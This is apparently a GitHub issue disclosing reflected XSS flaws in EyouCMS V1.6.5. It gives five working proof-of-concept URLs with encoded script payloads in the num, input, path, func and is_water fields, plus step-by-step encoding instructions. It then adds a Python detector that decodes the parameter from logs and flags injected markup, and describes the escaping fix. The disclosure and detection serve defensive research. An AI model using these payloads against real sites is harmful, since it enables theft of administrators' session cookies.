Open Hebing123 opened 10 months ago
This is a difficult vulnerability to detect, and I will add it if I get the CVE number in the future.
This is the vulnerability exploitation reference for CVE-2024-22927, CVE-2024-23031, CVE-2024-23032, CVE-2024-23033, CVE-2024-23034.

Summary

EyouCMS-V1.6.5: when uploading images locally, the program uses the info parameter to set the parameters carried by the upload form. Multiple reflected XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameters it contains to malicious values. These parameters are:
num
input
path
func
is_water
There is no update on GitHub; the latest installation package (V1.6.5) is: https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip

Details

The exploit of this XSS vulnerability mainly consists of constructing the parameters carried by the form: the header is referenced directly by <input> into the page. After JWT encryption, any "-" in the info parameter should be replaced with "+". The guess is that the developer may have implemented the URL encoding and decoding logic incorrectly, so that only "+" is accepted and not "-". This may be because they only considered standard URL encoding rules and ignored URL-safe encoding rules.

Impact

An administrator who is already logged in can have their cookie stolen after visiting the malicious URL.

POC

Note: you do not need to carry data when encrypting; just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform URL encoding. Don't do these steps in the wrong order, or you'll convert the "+" to a space.
In Header, when the num parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the input parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the path parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the func parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the is_water parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
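The report describes the decoding order the server applies to the info parameter (percent-decode the query, then base64-decode the JWT-style header, then read the JSON fields) and the "+"/"-" alphabet quirk. The following is an added example for log review and request inspection; it is not code from EyouCMS or from the reporter. It decodes the info value in that order, tolerating both the standard and the URL-safe base64 alphabet, and flags any of the five named fields whose value contains characters that would end an HTML attribute or open a tag. The first payload from the report is embedded as a sample input; the benign request is constructed here for comparison, and the example.invalid host and the helper names are assumptions.

```python
"""Decode the EyouCMS-style `info` upload parameter from a request URL and
flag header fields that would break out of an HTML attribute when reflected.

Added example for this issue (not EyouCMS code, not the reporter's code).
"""
import base64
import binascii
import json
from typing import Dict, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# Fields the report names as reflected unescaped into the upload form.
REFLECTED_FIELDS = ("num", "input", "path", "func", "is_water")

# Characters that, left unescaped, can terminate an attribute value or open a tag.
SUSPICIOUS_CHARS = set('<>"\'')

# First PoC URL from the report (sample input taken from the page).
REPORTED_URL = (
    "http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info="
    "eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoi"
    "MjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgi"
    "OiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn="
)


def decode_info(info_value: str) -> Optional[dict]:
    """Base64-decode an already percent-decoded `info` value into a dict.

    Both alphabets are accepted ('+', '/' and the URL-safe '-', '_'), so the
    check does not depend on which one the sender used; missing '=' padding is
    restored. Returns None when the value is not base64-encoded JSON.
    """
    normalized = info_value.replace("-", "+").replace("_", "/")
    normalized += "=" * (-len(normalized) % 4)
    try:
        raw = base64.b64decode(normalized, validate=True)
        data = json.loads(raw)
    except (binascii.Error, ValueError):
        return None
    return data if isinstance(data, dict) else None


def find_reflected_injections(url: str) -> Dict[str, str]:
    """Return {field: value} for reflected fields containing HTML metacharacters.

    parse_qs percent-decodes the query and turns a bare '+' into a space, which
    mirrors the order of operations the report says the server applies (a
    '%2B' survives as '+', a raw '+' does not).
    """
    query = parse_qs(urlsplit(url).query)
    findings: Dict[str, str] = {}
    for info_value in query.get("info", []):
        header = decode_info(info_value)
        if header is None:
            continue
        for field in REFLECTED_FIELDS:
            value = header.get(field)
            if isinstance(value, str) and SUSPICIOUS_CHARS & set(value):
                findings[field] = value
    return findings


def build_info_url(header: dict) -> str:
    """Constructed helper (assumed host): encode a header dict the way the
    report describes (base64, then percent-encoding) to produce test requests."""
    encoded = base64.b64encode(
        json.dumps(header, separators=(",", ":")).encode()
    ).decode()
    return "http://example.invalid/login.php?" + urlencode({"info": encoded})


if __name__ == "__main__":
    benign = build_info_url({"num": "1", "input": "", "func": "head_pic_call_back",
                             "path": "allimg", "is_water": "1", "alg": "HS256"})
    print("benign:", find_reflected_injections(benign))
    print("reported:", find_reflected_injections(REPORTED_URL))
```

Run over access-log URLs for login.php with c=Uploadimgnew, a non-empty result identifies which of the five fields carried markup; the decoded value can then be compared against what the upload form renders, and the server-side fix is to HTML-escape each of these fields before placing them in the <input> attributes.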